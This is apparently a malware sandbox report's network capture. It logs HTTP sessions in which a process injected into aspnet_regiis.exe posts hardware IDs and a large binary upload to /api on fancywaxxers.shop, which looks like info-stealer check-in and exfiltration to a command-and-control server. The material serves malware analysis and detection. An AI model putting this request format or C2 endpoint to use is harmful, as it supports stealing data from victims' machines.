                                                                            Data Ascii: --AMTB3QLKBFJ98IVContent-Disposition: form-data; name="hwid"EBC37E2E97F52F5C1B825E506F021727--AMTB3QLKBFJ98IVContent-Disposition: form-data; name="pid"2--AMTB3QLKBFJ98IVContent-Disposition: form-data; name="lid"BVnUqo--@youngesstt-
                                                                            2024-12-29 22:36:58 UTC1140INHTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:36:58 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=l00ti5jrad54fvcl185si0tf9a; expires=Thu, 24 Apr 2025 16:23:37 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n1rAsGP3Tfs78vviTJWDhBhkuJefgOmSXbOaOchdV6V1CTOIyzPc1yvSzJP13cxL5iP7CP4Wijc%2BxTN%2BB%2FAagb%2FhWQYD7c%2BVXlQniG%2FDRmRt%2B9anlnP3YBgFWhr4ipZuGZM3KA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d459e6a5c41a6-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1530&rtt_var=598&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13761&delivery_rate=1792510&cwnd=239&unsent_bytes=0&cid=3fa5ff3a1c8bde50&ts=611&x=0"
                                                                            2024-12-29 22:36:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2024-12-29 22:36:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.549709104.21.32.14435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-29 22:36:59 UTC278OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=7E5OXTHN8747P
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 15053
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:36:59 UTC15053OUTData Raw: 2d 2d 37 45 35 4f 58 54 48 4e 38 37 34 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 43 33 37 45 32 45 39 37 46 35 32 46 35 43 31 42 38 32 35 45 35 30 36 46 30 32 31 37 32 37 0d 0a 2d 2d 37 45 35 4f 58 54 48 4e 38 37 34 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 45 35 4f 58 54 48 4e 38 37 34 37 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 79 6f 75 6e 67 65 73 73 74 74 0d 0a 2d 2d 37 45 35 4f 58
                                                                            Data Ascii: --7E5OXTHN8747PContent-Disposition: form-data; name="hwid"EBC37E2E97F52F5C1B825E506F021727--7E5OXTHN8747PContent-Disposition: form-data; name="pid"2--7E5OXTHN8747PContent-Disposition: form-data; name="lid"BVnUqo--@youngesstt--7E5OX
                                                                            2024-12-29 22:36:59 UTC1140INHTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:36:59 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=ss5b5uhrknf899ugqlct5n9otp; expires=Thu, 24 Apr 2025 16:23:38 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jBI4IlrwpzZGWpLA3OFUKCuj1hw6cfvnqidjR2LMgTRQk5UCBicWH%2BJlCk%2FU15I%2Bh%2B%2BvFRQRty5E3FdtnlZaQK86w4viH%2BL9dN4WMjjRRnrIb4gG0mP5TGN7jY%2BYAvXEaeJIBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d45a60bccc327-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1673&rtt_var=836&sent=10&recv=20&lost=0&retrans=1&sent_bytes=4228&recv_bytes=15989&delivery_rate=257246&cwnd=189&unsent_bytes=0&cid=c669fef1783b94ff&ts=501&x=0"
                                                                            2024-12-29 22:36:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2024-12-29 22:36:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.549714104.21.32.14435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-29 22:37:00 UTC279OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=CVKA9J29E8AUJ7
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20549
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:37:00 UTC15331OUTData Raw: 2d 2d 43 56 4b 41 39 4a 32 39 45 38 41 55 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 43 33 37 45 32 45 39 37 46 35 32 46 35 43 31 42 38 32 35 45 35 30 36 46 30 32 31 37 32 37 0d 0a 2d 2d 43 56 4b 41 39 4a 32 39 45 38 41 55 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 56 4b 41 39 4a 32 39 45 38 41 55 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 79 6f 75 6e 67 65 73 73 74 74 0d 0a 2d 2d 43 56
                                                                            Data Ascii: --CVKA9J29E8AUJ7Content-Disposition: form-data; name="hwid"EBC37E2E97F52F5C1B825E506F021727--CVKA9J29E8AUJ7Content-Disposition: form-data; name="pid"3--CVKA9J29E8AUJ7Content-Disposition: form-data; name="lid"BVnUqo--@youngesstt--CV
                                                                            2024-12-29 22:37:00 UTC5218OUTData Raw: 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00
                                                                            Data Ascii: Zh'F3Wun 4F([:7s~X`nO`i
                                                                            2024-12-29 22:37:01 UTC1131INHTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:37:01 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=p3itkkf29qdaaq58tc7onscb4p; expires=Thu, 24 Apr 2025 16:23:40 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K1gNe8Z50xQhy4U8N0h4mSelIgydnz7G8ClZZixiuyXiz4QxnMqlTGRGdm8XeYorYppPYOynTKmpbAEjFzZoer0fGvaoKo6B%2BbAmUmYzFrqI72ftDbrKBZDSeD%2Fql%2FbNtMgTYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d45b0ac684344-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1709&rtt_var=658&sent=9&recv=26&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21508&delivery_rate=1643218&cwnd=47&unsent_bytes=0&cid=7163c82a0152d0e1&ts=639&x=0"
                                                                            2024-12-29 22:37:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2024-12-29 22:37:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.549715104.21.32.14435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-29 22:37:02 UTC280OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=4H4JHYC6MWK5EZIZ
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 1280
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:37:02 UTC1280OUTData Raw: 2d 2d 34 48 34 4a 48 59 43 36 4d 57 4b 35 45 5a 49 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 43 33 37 45 32 45 39 37 46 35 32 46 35 43 31 42 38 32 35 45 35 30 36 46 30 32 31 37 32 37 0d 0a 2d 2d 34 48 34 4a 48 59 43 36 4d 57 4b 35 45 5a 49 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 48 34 4a 48 59 43 36 4d 57 4b 35 45 5a 49 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 79 6f 75 6e 67 65 73 73 74 74
                                                                            Data Ascii: --4H4JHYC6MWK5EZIZContent-Disposition: form-data; name="hwid"EBC37E2E97F52F5C1B825E506F021727--4H4JHYC6MWK5EZIZContent-Disposition: form-data; name="pid"1--4H4JHYC6MWK5EZIZContent-Disposition: form-data; name="lid"BVnUqo--@youngesstt
                                                                            2024-12-29 22:37:03 UTC1132INHTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:37:03 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=19oi9fbrtnetd8fdi2t64u3b8e; expires=Thu, 24 Apr 2025 16:23:41 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ol6xC3nRV8fKhYVRu%2B1%2FK%2FOlhDRtXaq%2FEcP7rCBO8o5VHyluvz1dHLCWyilsAlaFwefEl1Gm3J9bvLWOwN3uBkZ8r2BOAzVXueAanxECfCgu6ac51SfuZocCGHo8VMCNvVlRBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d45ba4c0b1875-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1631&rtt_var=624&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2196&delivery_rate=1737061&cwnd=153&unsent_bytes=0&cid=5a9da72fe1c9aaa8&ts=706&x=0"
                                                                            2024-12-29 22:37:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2024-12-29 22:37:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.549716104.21.32.14435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-29 22:37:04 UTC283OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=L5A4SY5A1OSHVBRM0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 586242
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:37:04 UTC15331OUTData Raw: 2d 2d 4c 35 41 34 53 59 35 41 31 4f 53 48 56 42 52 4d 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 43 33 37 45 32 45 39 37 46 35 32 46 35 43 31 42 38 32 35 45 35 30 36 46 30 32 31 37 32 37 0d 0a 2d 2d 4c 35 41 34 53 59 35 41 31 4f 53 48 56 42 52 4d 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 35 41 34 53 59 35 41 31 4f 53 48 56 42 52 4d 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 79 6f 75 6e 67 65 73
                                                                            Data Ascii: --L5A4SY5A1OSHVBRM0Content-Disposition: form-data; name="hwid"EBC37E2E97F52F5C1B825E506F021727--L5A4SY5A1OSHVBRM0Content-Disposition: form-data; name="pid"1--L5A4SY5A1OSHVBRM0Content-Disposition: form-data; name="lid"BVnUqo--@younges
                                                                            2024-12-29 22:37:04 UTC15331OUTData Raw: 9b 44 72 8d 2e 43 5b 1b 1a da 50 6a 0b 97 9a 39 67 fa f9 09 fd d6 59 3f 92 d1 8b da 23 be a2 12 c9 30 6a 65 fd fd 13 d8 6e a4 ac 01 d6 44 f1 fb d1 2c 21 26 c2 df ba c5 01 c1 be 7c 35 c0 6f 2c 25 bb f7 76 48 3b 74 48 95 74 18 a8 0d 73 6d fd 1e 49 8e 01 6e 67 e5 32 03 9a 4d 69 c6 12 40 d2 e3 d0 20 d5 87 a1 2f 01 cb 53 08 ec c0 6d f8 c8 a0 67 21 46 eb 7e 90 6c cd 0b 28 5e 15 fd 4b 61 70 75 66 bf bd c2 92 f0 85 e0 23 f0 2b 6a 13 9f 05 ab b9 27 ef e0 bd 22 91 6b 27 29 81 6e 10 e3 c9 2b d0 06 57 83 2d c3 6b eb f6 c5 68 50 e7 d7 f1 77 a5 e6 aa 34 16 ce 08 c6 d1 0e 21 ba 02 75 a3 12 21 c3 d7 41 12 18 13 5e 91 de 1d 1d 88 a1 23 c9 23 91 a9 ba 36 9b a1 83 99 a6 4c cf 87 fd 8d bc 6a 18 97 41 5b f9 c6 b4 8d 06 d0 9e 65 9a f0 c9 50 93 a5 66 6a 05 98 34 08 f3 74 35 2f
                                                                            Data Ascii: Dr.C[Pj9gY?#0jenD,!&|5o,%vH;tHtsmIng2Mi@ /Smg!F~l(^Kapuf#+j'"k')n+W-khPw4!u!A^##6LjA[ePfj4t5/
                                                                            2024-12-29 22:37:04 UTC15331OUTData Raw: 42 ca df 7b d4 2d 47 95 e5 3b bf bb 9b 17 d4 07 03 6a 39 aa 63 8f 54 cc c6 a4 1c b5 7c b3 08 13 c1 b1 42 89 a0 e1 35 37 6a 28 3d 19 6f 05 c2 14 26 0a e6 bb ca 81 26 ca ed 51 2b 41 2c ad ab 19 c1 d7 80 7d 28 a1 05 7d 4f 3c 94 ea c3 fe 3e d4 28 a5 e6 44 b2 a7 4f 72 f7 69 a3 34 92 1a df 0b a9 cc ec f6 5e b8 fa 04 cf d6 44 c1 c9 f2 57 e6 22 5b e7 a9 42 70 3c 42 59 97 c1 16 e0 7a 9e 5c 35 69 4c d5 45 7b c5 b7 c5 bf ab 9a 04 45 02 35 ca 90 22 e0 9f 1a e6 fe 1c 16 fc 7b 9a be 9d 25 c8 52 1f 94 4a 8b d1 59 77 1b ed aa 35 c0 de ed 54 bf e2 82 b3 39 44 fa 45 77 3e aa 70 6f f1 c0 5e a4 94 06 09 0d 9e 3b bf f7 bf c4 d0 8b 69 b9 6e 0d 8e d6 18 2b f9 10 10 40 af da 1c 96 69 d7 38 4a 8a 88 ba 27 29 8a 9b e4 a7 da b2 d2 a9 09 a0 45 6b 71 b2 f2 00 81 60 9a c9 76 ff 62 c2
                                                                            Data Ascii: B{-G;j9cT|B57j(=o&&Q+A,}(}O<>(DOri4^DW"[Bp<BYz\5iLE{E5"{%RJYw5T9DEw>po^;in+@i8J')Ekq`vb
                                                                            2024-12-29 22:37:04 UTC15331OUTData Raw: b3 81 83 f6 43 a9 b2 b3 1b 13 54 6d 04 9a f3 fe c7 2f d2 3e 8e e2 39 e9 c1 4b 5d c2 b5 e5 7f 47 89 20 d5 b9 b2 a3 ea d3 42 1b 37 26 0c 4b 11 03 b9 6e ff 1c 7b 27 9c 30 20 18 01 2c 37 61 24 b5 1d 41 c9 f4 43 1a 63 a0 5d 63 fb 9e 01 ca 4b f6 35 8d 7f cf 23 c8 de 5b d4 bf cb 3b 3b e7 d0 aa e6 7f 40 49 10 e0 44 83 35 71 90 f4 d2 5e 14 74 71 a6 aa 86 2b bc 74 66 87 64 21 c5 9e 7e b9 03 61 83 c0 5b ec 1a 93 41 45 4c 10 34 6d 9e a7 35 11 b2 35 30 77 24 a3 09 70 50 79 0e bb a6 ab f3 6f 33 6a c3 d1 03 26 cc e0 9d 6d e2 15 2c f0 3f e2 c1 3f 03 60 60 e6 c9 89 be b1 8f 22 bd 76 0a 01 24 d8 f3 65 23 04 e7 67 b5 26 16 95 8e 72 78 38 ad 0c d1 ad 56 79 4e 51 03 59 57 4d 85 c6 64 e7 e3 11 64 4c 64 d4 ed d3 d2 db 17 0c eb ef 35 cc 7e 2c c4 2a 1c 48 15 b1 c1 51 a0 c8 dd 05
                                                                            Data Ascii: CTm/>9K]G B7&Kn{'0 ,7a$ACc]cK5#[;;@ID5q^tq+tfd!~a[AEL4m550w$pPyo3j&m,??``"v$e#g&rx8VyNQYWMddLd5~,*HQ
                                                                            2024-12-29 22:37:04 UTC15331OUTData Raw: da 15 89 c6 3a bf 3b 15 76 8a a9 d6 0d ed 2b 24 47 1d 65 d8 7b e5 17 8b 77 1c ff a4 ac 4a 37 da f0 2e b8 b6 fd cf fb 66 b2 82 cc ca c0 21 b5 ca f6 70 6b 4a 26 68 a9 f7 f6 09 c7 3f a7 3f 81 5a cc b3 44 6a 83 b5 aa cb ec a2 a9 c5 bc d0 49 a3 c2 63 e7 e3 17 27 84 49 35 24 85 e9 ad ba 17 42 74 f7 7f 22 ae 78 bf 9c 83 4b 88 00 d0 58 fc 24 75 65 02 c5 f8 33 90 77 0a ea dc 61 73 e1 a0 4d ba a3 45 4d 57 78 b2 02 fe df 09 82 3b 22 b5 67 b7 bc f8 51 73 44 0f 39 fa 6a eb 66 bf e3 4f 57 dc 7a 90 d9 33 64 7f ec 8c 0e c8 17 66 4d cf c2 80 0b 2a 7c 77 6e 07 5e ee ff 40 d8 0f 53 dc bf 73 e0 7b 01 ac 4c ba 93 af 29 73 60 42 d6 0f c8 fd 96 fd 83 81 83 7a 47 73 f6 f0 02 04 c1 f3 6f 86 09 eb b2 f9 81 fc 34 7a 3c fb 09 82 51 c3 95 7e f5 a3 4a 13 55 fd 78 2b f1 b4 2f fe b8 b4
                                                                            Data Ascii: :;v+$Ge{wJ7.f!pkJ&h??ZDjIc'I5$Bt"xKX$ue3wasMEMWx;"gQsD9jfOWz3dfM*|wn^@Ss{L)s`BzGso4z<Q~JUx+/
                                                                            2024-12-29 22:37:04 UTC15331OUTData Raw: 26 20 14 df 4b 35 69 2f 12 a8 de bd 96 bd 0c e4 be 28 46 d2 9e 5d a2 d2 63 f2 a2 43 8e b0 da 2a df 84 c7 ef bc 18 84 23 ba 30 10 19 ac a2 e4 47 d4 b8 74 a5 d5 66 ad 66 17 c1 13 5c dc 6f ee ec 94 1c 16 49 c3 c0 20 ac 3f 53 1c ff e8 99 79 5e 7d d8 25 2e 22 42 05 41 87 44 e3 3c ab 36 be 7d d6 ec 93 22 94 54 ab d7 b4 65 cd c8 24 c4 2d a3 d5 38 d6 5d 69 65 3c 63 cf da b5 87 c5 78 cd bf 85 32 95 5e 32 12 21 37 05 7a e8 45 f3 c9 81 30 31 dc 9b 90 f8 65 1e e7 21 f9 59 6b a6 2f 0f bf 30 b9 a9 c2 40 2f 44 f8 fd 28 db 9a 64 16 60 77 07 6b a2 66 ab ca 08 45 0b 11 e7 28 f8 65 9e d5 5a ba 86 86 0d f1 2a 92 2b f8 fb 1a bd bd 2f 52 c0 cc db 07 96 eb c6 16 fa c5 fc 07 23 47 2b 0c a5 56 b7 16 d4 9f 5f e7 7e b0 c3 1c 26 73 84 b0 30 eb 0d 02 a4 04 9e 3c 98 2c 90 bc ef e6 13
                                                                            Data Ascii: & K5i/(F]cC*#0Gtff\oI ?Sy^}%."BAD<6}"Te$-8]ie<cx2^2!7zE01e!Yk/0@/D(d`wkfE(eZ*+/R#G+V_~&s0<,
                                                                            2024-12-29 22:37:04 UTC15331OUTData Raw: 85 0f 12 fc 86 9e 25 d7 32 2e cd 47 b9 a2 06 97 9e b6 e1 81 a4 c9 ff 8d c0 0c 10 11 f8 df 18 8f 6f c9 70 e5 23 10 07 98 63 d0 f6 b1 52 dc 8c 00 d3 29 0b f3 6a 00 9f 9f 8b 53 76 86 00 a6 dd 44 c8 4e 39 0d 0b 9f 90 cd 09 49 bf 04 9f 7a ad 94 8e f7 d6 5b 50 57 57 7d 78 89 e6 87 36 c6 84 cf 4d bc 68 f4 da 2f 26 af 0a b5 b2 f2 fc 79 07 f4 85 74 b6 07 51 f0 79 f4 85 fd de 6c 33 cf d7 c5 04 5b 38 a7 0f 04 2e 63 ae 0d a6 36 ad b9 1c 4b 3c e2 84 04 77 2c 04 f8 b7 f0 a0 34 fa 20 b2 0a 7b 1a 74 60 d9 8d 0b ac 89 1a ca d4 57 95 9c 82 26 43 43 4d c9 9c 23 94 58 54 74 1a a5 d1 c0 cd a5 6e ff 16 65 54 1d 4a 2b e3 59 e1 5f be 26 4a 02 b1 31 e7 39 a7 41 21 b2 20 c6 73 d1 6c f0 0c e3 9e 38 eb c6 62 b4 2e c7 be 07 97 eb 8d 15 43 09 c8 17 fe 52 16 c6 2b ae 59 bd f9 6f 7b bc
                                                                            Data Ascii: %2.Gop#cR)jSvDN9Iz[PWW}x6Mh/&ytQyl3[8.c6K<w,4 {t`W&CCM#XTtneTJ+Y_&J19A! sl8b.CR+Yo{
                                                                            2024-12-29 22:37:04 UTC15331OUTData Raw: 79 7e 27 0a 25 fc 06 24 a3 48 c9 35 ae 0f c8 ed ff 65 be 56 94 55 98 c3 00 fe 3e 0f 6b 75 ba fc 04 5b b4 d3 79 87 30 49 17 9a d5 ec fc 9d 70 a7 3a 8a aa bb cf ca 95 5f f8 0f fe 98 7a d8 1a 58 b9 e2 7b af 8a 96 a1 e4 6a 2e 34 1e 67 7b dc 14 56 6e 0e ce c3 02 8b 2c 34 c1 67 e0 9f 5b ff d9 1a 84 79 1a 0a a6 ed 7e f1 8b 18 c5 16 9c 73 d4 93 24 de 6a be aa 38 b0 43 aa ac 3a 94 f7 df a3 a8 17 77 69 7f ac d1 64 84 d7 0d 27 fc ce c4 c8 8c f4 78 e7 b1 be 7d 62 9f e6 38 76 95 85 9c da 5d 02 fe 54 3e cf 76 ea 77 ea 6f 2e d3 74 5a 5d 4f 88 d3 51 d5 1f 06 84 b4 cf f4 52 e3 06 29 70 b3 b0 8f 7d 81 77 23 ea 0e 2c ac 25 af 04 06 53 e6 d6 97 c6 8c d7 cb f3 f8 e0 82 05 23 6f 95 6b 28 37 68 0f b7 80 ad 53 55 51 02 a8 ef 1e ed 21 8e 62 60 bd bb cd 2b ef 58 5b 85 11 3e 03 fd
                                                                            Data Ascii: y~'%$H5eVU>ku[y0Ip:_zX{j.4g{Vn,4g[y~s$j8C:wid'x}b8v]T>vwo.tZ]OQR)p}w#,%S#ok(7hSUQ!b`+X[>
